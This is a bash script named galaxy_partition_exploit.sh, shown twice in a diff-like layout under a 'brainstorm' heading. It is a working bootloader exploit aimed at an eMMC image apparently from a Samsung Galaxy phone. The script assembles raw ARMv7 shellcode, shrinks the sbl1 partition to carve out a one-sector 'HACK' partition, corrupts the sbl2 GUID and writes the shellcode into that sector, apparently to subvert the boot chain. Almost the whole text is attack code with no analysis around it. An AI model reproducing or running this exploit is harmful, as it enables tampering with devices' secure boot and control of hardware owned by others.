brainstorm · July 20, 2025 02:35
diff --git a/galaxy_partition_exploit.sh b/galaxy_partition_exploit.sh
 % cat galaxy_partition_exploit.sh
 #!/bin/bash
 set -euo pipefail

 DISK="jfleatt_emmc_dump.img"       # Disk image to modify
 SBL1_PART=3                        # sbl1 partition number
 SBL2_PART=4                        # sbl2 partition number (GUID to invalidate)
 INVALID_GUID="17171717-1717-1717-1717-171717171717"
 HACK_GUID="11111111-2222-3333-4444-555555555555" # GUID for HACK
 PAYLOAD_TMP="payload.bin"

 # === ARMv7 shellcode to assemble (raw, no header) ===
 SHELLCODE="mov r0, #0; ldr r1, [pc, #0x3c]; strb r0, [r1]; ldr r0, [pc, #0x38]; \
 ldr r1, [pc, #0x38]; str r0, [r1]; ldr r1, [pc, #0x34]; str r0, [r1]; \
 ldr r0, [pc, #0x30]; ldr r1, [pc, #0x20]; ldr r3, [pc, #0x2c]; \
 ldr r2, [r0]; str r2, [r1]; add r0, r0, #4; add r1, r1, #4; \
 cmp r0, r3; blt #-0x2c; ldr pc, [pc, #0x14]"

 # Assemble shellcode
 echo "[*] Assembling shellcode..."
 rasm2 -a arm -b 32 "$SHELLCODE" | xxd -r -p > "$PAYLOAD_TMP"
 echo "[+] Payload assembled: $PAYLOAD_TMP ($(stat -c%s "$PAYLOAD_TMP") bytes)"

 # MD5 before modifications
 echo "[*] MD5 before changes:"
 md5sum "$DISK"

 # Get sbl1 start and end sectors
 echo "[*] Fetching sbl1 (partition $SBL1_PART) start/end sectors..."
 PART_INFO=$(echo -e "i\n$SBL1_PART\nq\n" | gdisk "$DISK")
 START_SECTOR=$(echo "$PART_INFO" | awk '/First sector/ {print $3}')
 END_SECTOR=$(echo "$PART_INFO" | awk '/Last sector/ {print $3}')
 if [ -z "$START_SECTOR" ] || [ -z "$END_SECTOR" ]; then
  echo "[-] Failed to get sbl1 partition info!"
  exit 1
 fi

 NEW_END=$((END_SECTOR - 1))   # Shrink by one sector
 HACK_SECTOR=$END_SECTOR       # Last sector becomes HACK

 echo "[*] Recreating sbl1 and HACK partitions..."
 # Delete sbl1, recreate with new end sector, add HACK (1 sector)
 echo -e "d\n$SBL1_PART\nn\n$SBL1_PART\n$START_SECTOR\n$NEW_END\n0700\nc\nsbl1\nn\n\n$HACK_SECTOR\n$HACK_SECTOR\n0700\nc\nHACK\nw\ny\n" | gdisk "$DISK" || true

 # Change sbl2 GUID to an invalid value
 echo "[*] Changing GUID for sbl2 (partition $SBL2_PART)..."
 echo -e "x\ni\n$SBL2_PART\nc\n$INVALID_GUID\nw\ny\n" | gdisk "$DISK" || true

 # Write shellcode payload to HACK sector
 echo "[*] Writing payload to HACK sector $HACK_SECTOR..."
 dd if="$PAYLOAD_TMP" of="$DISK" bs=512 seek="$HACK_SECTOR" conv=notrunc status=progress

 # MD5 after modifications
 echo "[*] MD5 after changes:"
 md5sum "$DISK"

 echo "[+] Done. Verify partitions with: gdisk -l $DISK"
	% cat galaxy_partition_exploit.sh
	#!/bin/bash
	set -euo pipefail

	DISK="jfleatt_emmc_dump.img" # Disk image to modify
	SBL1_PART=3 # sbl1 partition number
	SBL2_PART=4 # sbl2 partition number (GUID to invalidate)
	INVALID_GUID="17171717-1717-1717-1717-171717171717"
	HACK_GUID="11111111-2222-3333-4444-555555555555" # GUID for HACK
	PAYLOAD_TMP="payload.bin"

	# === ARMv7 shellcode to assemble (raw, no header) ===
	SHELLCODE="mov r0, #0; ldr r1, [pc, #0x3c]; strb r0, [r1]; ldr r0, [pc, #0x38]; \
	ldr r1, [pc, #0x38]; str r0, [r1]; ldr r1, [pc, #0x34]; str r0, [r1]; \
	ldr r0, [pc, #0x30]; ldr r1, [pc, #0x20]; ldr r3, [pc, #0x2c]; \
	ldr r2, [r0]; str r2, [r1]; add r0, r0, #4; add r1, r1, #4; \
	cmp r0, r3; blt #-0x2c; ldr pc, [pc, #0x14]"

	# Assemble shellcode
	echo "[*] Assembling shellcode..."
	rasm2 -a arm -b 32 "$SHELLCODE" \| xxd -r -p > "$PAYLOAD_TMP"
	echo "[+] Payload assembled: $PAYLOAD_TMP ($(stat -c%s "$PAYLOAD_TMP") bytes)"

	# MD5 before modifications
	echo "[*] MD5 before changes:"
	md5sum "$DISK"

	# Get sbl1 start and end sectors
	echo "[*] Fetching sbl1 (partition $SBL1_PART) start/end sectors..."
	PART_INFO=$(echo -e "i\n$SBL1_PART\nq\n" \| gdisk "$DISK")
	START_SECTOR=$(echo "$PART_INFO" \| awk '/First sector/ {print $3}')
	END_SECTOR=$(echo "$PART_INFO" \| awk '/Last sector/ {print $3}')
	if [ -z "$START_SECTOR" ] \|\| [ -z "$END_SECTOR" ]; then
	echo "[-] Failed to get sbl1 partition info!"
	exit 1
	fi

	NEW_END=$((END_SECTOR - 1)) # Shrink by one sector
	HACK_SECTOR=$END_SECTOR # Last sector becomes HACK

	echo "[*] Recreating sbl1 and HACK partitions..."
	# Delete sbl1, recreate with new end sector, add HACK (1 sector)
	echo -e "d\n$SBL1_PART\nn\n$SBL1_PART\n$START_SECTOR\n$NEW_END\n0700\nc\nsbl1\nn\n\n$HACK_SECTOR\n$HACK_SECTOR\n0700\nc\nHACK\nw\ny\n" \| gdisk "$DISK" \|\| true

	# Change sbl2 GUID to an invalid value
	echo "[*] Changing GUID for sbl2 (partition $SBL2_PART)..."
	echo -e "x\ni\n$SBL2_PART\nc\n$INVALID_GUID\nw\ny\n" \| gdisk "$DISK" \|\| true

	# Write shellcode payload to HACK sector
	echo "[*] Writing payload to HACK sector $HACK_SECTOR..."
	dd if="$PAYLOAD_TMP" of="$DISK" bs=512 seek="$HACK_SECTOR" conv=notrunc status=progress

	# MD5 after modifications
	echo "[*] MD5 after changes:"
	md5sum "$DISK"

	echo "[+] Done. Verify partitions with: gdisk -l $DISK"